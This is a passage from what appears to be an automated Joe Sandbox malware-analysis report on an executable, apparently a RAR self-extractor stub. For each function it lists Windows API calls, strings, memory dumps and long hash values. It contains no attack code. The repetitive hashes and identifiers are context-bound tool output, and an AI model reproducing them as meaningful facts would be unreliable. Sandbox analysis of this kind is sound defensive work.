                                                                                                    • Instruction Fuzzy Hash: 3E910271204344AFD610DF25D848D6BBBE8FFC8710F04592EF99AE3221DB71A949CB62
                                                                                                    Function 00E0C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E105DA: _wcslen.LIBCMT ref: 00E105E0
                                                                                                      • Part of subcall function 00E0B92D: _wcsrchr.LIBVCRUNTIME ref: 00E0B944
                                                                                                    • _wcslen.LIBCMT ref: 00E0C197
                                                                                                    • _wcslen.LIBCMT ref: 00E0C1DF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$_wcsrchr
                                                                                                    • String ID: .exe$.rar$.sfx
                                                                                                    • API String ID: 3513545583-31770016
                                                                                                    • Opcode ID: 401e911393677c82a9fedcba04c69ca2dd2a41e937d4eef0269081c11f5154eb
                                                                                                    • Instruction ID: 527597b7c387a9ceea0a92526aece777fb11ffda11a5057013304bae202213bc
                                                                                                    • Opcode Fuzzy Hash: 401e911393677c82a9fedcba04c69ca2dd2a41e937d4eef0269081c11f5154eb
                                                                                                    • Instruction Fuzzy Hash: 4B41F232501311A5C632AF749846ABBB3B8EF54708F347A4EF9817B5C2EBA04DC2C391
                                                                                                    Function 00E0BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00E0BB27
                                                                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00E0A275,?,?,00000800,?,00E0A23A,?,00E0755C), ref: 00E0BBC5
                                                                                                    • _wcslen.LIBCMT ref: 00E0BC3B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$CurrentDirectory
                                                                                                    • String ID: UNC$\\?\
                                                                                                    • API String ID: 3341907918-253988292
                                                                                                    • Opcode ID: 10b511db4b468861db0bd54a89ff2145a55681599ca63a45e802be562e8e525e
                                                                                                    • Instruction ID: 91ad9664260bef969ae0e9ef325764e471471c8ad5c55fe1574e5e4cf07de9c1
                                                                                                    • Opcode Fuzzy Hash: 10b511db4b468861db0bd54a89ff2145a55681599ca63a45e802be562e8e525e
                                                                                                    • Instruction Fuzzy Hash: 4141A031440216A6EF21AF20CC85EEEB7A9BF41394F156565F854B3291EBB4DED0CB60
                                                                                                    Function 00E27F6E Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\voed9G7p5s.exe,00000104), ref: 00E27FAE
                                                                                                    • _free.LIBCMT ref: 00E28079
                                                                                                    • _free.LIBCMT ref: 00E28083
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$FileModuleName
                                                                                                    • String ID: C:\Users\user\Desktop\voed9G7p5s.exe$`%Z
                                                                                                    • API String ID: 2506810119-394931287
                                                                                                    • Opcode ID: ea0f2c1db56c218b57286718a7f7922cf8ad8ad9613294cb885d15afb81015e4
                                                                                                    • Instruction ID: 59a464658db81ccbb5decd4f48fa7c371af24c2e92c34981214a2fd83e56f10b
                                                                                                    • Opcode Fuzzy Hash: ea0f2c1db56c218b57286718a7f7922cf8ad8ad9613294cb885d15afb81015e4
                                                                                                    • Instruction Fuzzy Hash: 9031B171A05228AFEB21DF95F980D9EBBFCEF95350F10506AF904B7211DAB08E48CB51
                                                                                                    Function 00E1CD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00E1CD84
                                                                                                      • Part of subcall function 00E1AF98: _wcschr.LIBVCRUNTIME ref: 00E1B033
                                                                                                      • Part of subcall function 00E11FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E0C116,00000000,.exe,?,?,00000800,?,?,?,00E18E3C), ref: 00E11FD1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcschr$CompareString
                                                                                                    • String ID: <$HIDE$MAX$MIN
                                                                                                    • API String ID: 69343711-3358265660
                                                                                                    • Opcode ID: c62da306e98a7c3d1d258c4ca7ecfd3b62c31cca92cdf3bfb62a08b96be31eb3
                                                                                                    • Instruction ID: 9335d047d039aacbbbb92c48c508caed3b342cd855f79abab80eadcdfe70e879
                                                                                                    • Opcode Fuzzy Hash: c62da306e98a7c3d1d258c4ca7ecfd3b62c31cca92cdf3bfb62a08b96be31eb3
                                                                                                    • Instruction Fuzzy Hash: B5317E72A40619AADF25CB60DC45BEE73BCEB15354F5091A6E901F7180EBB09AC48FA1
                                                                                                    Function 00E1AAC9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 00E1AAD2
                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00E1AB01
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00E1AB99
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectRelease
                                                                                                    • String ID: -$7
                                                                                                    • API String ID: 1429681911-474858286
                                                                                                    • Opcode ID: 9672f0597d25346b435a40f2a9986aea188acd291181d7bf9889a4315d0ef6a9
                                                                                                    • Instruction ID: f6d265c897618d98e16455ce0cd6913cf8843a858f90bb888a2b74adf7608a74
                                                                                                    • Opcode Fuzzy Hash: 9672f0597d25346b435a40f2a9986aea188acd291181d7bf9889a4315d0ef6a9
                                                                                                    • Instruction Fuzzy Hash: 32214C72108304BFD3409FA6EC48E6FBFE9FB89395F040919FA45A2121D7719A5C9B62
                                                                                                    Function 00E0B991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _swprintf.LIBCMT ref: 00E0B9B8
                                                                                                      • Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00E0B9D6
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00E0B9E6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                    • String ID: %c:\
                                                                                                    • API String ID: 525462905-3142399695
                                                                                                    • Opcode ID: f818a205b4f0ddf1966b9b1c4f4e8250576f0f00db08c64427537fcb5132567b
                                                                                                    • Instruction ID: 69b1cc968a9d949c118038e4eb404c99a4aaf8eaab856ce1ec5e5fef7f41f37c
                                                                                                    • Opcode Fuzzy Hash: f818a205b4f0ddf1966b9b1c4f4e8250576f0f00db08c64427537fcb5132567b
                                                                                                    • Instruction Fuzzy Hash: 6B01F963600312B5DA306B359C85D6BA7ECFE95770B406D0EF544F60C2EB24D884C2B1
                                                                                                    Function 00E1B270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E01316: GetDlgItem.USER32(00000000,00003021), ref: 00E0135A
                                                                                                      • Part of subcall function 00E01316: SetWindowTextW.USER32(00000000,00E335F4), ref: 00E01370
                                                                                                    • EndDialog.USER32(?,00000001), ref: 00E1B2BE
                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00E1B2D6
                                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 00E1B304
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                    • String ID: GETPASSWORD1$xz
                                                                                                    • API String ID: 445417207-3234807970
                                                                                                    • Opcode ID: 4db4b98231206c1d706d0e9184ea9e7a775162a486261100c84af0e3478dd413
                                                                                                    • Instruction ID: cdcc6da63053048e732f03d07476ffd407424935daafa9b7d7ed72be4c1cf1ff
                                                                                                    • Opcode Fuzzy Hash: 4db4b98231206c1d706d0e9184ea9e7a775162a486261100c84af0e3478dd413
                                                                                                    • Instruction Fuzzy Hash: 7211C432900118BADB219A74AD4AFFF376CEF5A754F001020FA45F61D0C7B5AA999761
                                                                                                    Function 00E1B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadBitmapW.USER32(00000065), ref: 00E1B6ED
                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00E1B712
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00E1B744
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00E1B767
                                                                                                      • Part of subcall function 00E1A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00E1B73D,00000066), ref: 00E1A6D5
                                                                                                      • Part of subcall function 00E1A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00E1B73D,00000066), ref: 00E1A6EC
                                                                                                      • Part of subcall function 00E1A6C2: LoadResource.KERNEL32(00000000,?,?,?,00E1B73D,00000066), ref: 00E1A703
                                                                                                      • Part of subcall function 00E1A6C2: LockResource.KERNEL32(00000000,?,?,?,00E1B73D,00000066), ref: 00E1A712
                                                                                                      • Part of subcall function 00E1A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00E1B73D,00000066), ref: 00E1A72D
                                                                                                      • Part of subcall function 00E1A6C2: GlobalLock.KERNEL32(00000000), ref: 00E1A73E
                                                                                                      • Part of subcall function 00E1A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00E1A762
                                                                                                      • Part of subcall function 00E1A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00E1A7A7
                                                                                                      • Part of subcall function 00E1A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00E1A7C6
                                                                                                      • Part of subcall function 00E1A6C2: GlobalFree.KERNEL32(00000000), ref: 00E1A7CD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                    • String ID: ]
                                                                                                    • API String ID: 1797374341-3352871620
                                                                                                    • Opcode ID: 0c4ab8d79b363746b7011f6ddf3b61629abdd2862b5077dac925fac1a2978801
                                                                                                    • Instruction ID: 7d91030ed2e5cf494ed97fd85b406adf69461d44a25c8a02691df8ad05d2a4f3
                                                                                                    • Opcode Fuzzy Hash: 0c4ab8d79b363746b7011f6ddf3b61629abdd2862b5077dac925fac1a2978801
                                                                                                    • Instruction Fuzzy Hash: 7801D6369412016BC71277749D09AFF7AFA9FC17A6F081121F900B72D6DF718D8D4261
                                                                                                    Function 00E1D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E01316: GetDlgItem.USER32(00000000,00003021), ref: 00E0135A
                                                                                                      • Part of subcall function 00E01316: SetWindowTextW.USER32(00000000,00E335F4), ref: 00E01370
                                                                                                    • EndDialog.USER32(?,00000001), ref: 00E1D64B
                                                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00E1D661
                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00E1D675
                                                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 00E1D684
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                    • String ID: RENAMEDLG
                                                                                                    • API String ID: 445417207-3299779563
                                                                                                    • Opcode ID: dd56221975e3fe8bb789772147bdec15be41ab14b714b8642a2ec02c8b3bf55d
                                                                                                    • Instruction ID: 81ae2f3aa5c5fc5d8488b5efe10b2daf721df8f2c9dd3996ee67a8cf99effa4c
                                                                                                    • Opcode Fuzzy Hash: dd56221975e3fe8bb789772147bdec15be41ab14b714b8642a2ec02c8b3bf55d
                                                                                                    • Instruction Fuzzy Hash: C1012833249310BED2114F75AD09FDB7B5CEB5AB42F110410F305B20D0C7A2998C8B79
                                                                                                    Function 00E27E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00E27E24,?,?,00E27DC4,?,00E3C300,0000000C,00E27F1B,?,00000002), ref: 00E27E93
                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E27EA6
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00E27E24,?,?,00E27DC4,?,00E3C300,0000000C,00E27F1B,?,00000002,00000000), ref: 00E27EC9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: 288d582c9e4a31451faf2ded77004d2e83c50d1dbb5e7ca72f06f3437339ca97
                                                                                                    • Instruction ID: e625ea2bd7124cad1756ae2dc4b6bf70865b3200da03b1de70349dbf389f0eff
                                                                                                    • Opcode Fuzzy Hash: 288d582c9e4a31451faf2ded77004d2e83c50d1dbb5e7ca72f06f3437339ca97
                                                                                                    • Instruction Fuzzy Hash: 8FF03C31A0421CBFCB159BA5EC0DBAEBFB5EB44715F0180A9F805B2260DB759E44CAA0
                                                                                                    Function 00E0F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
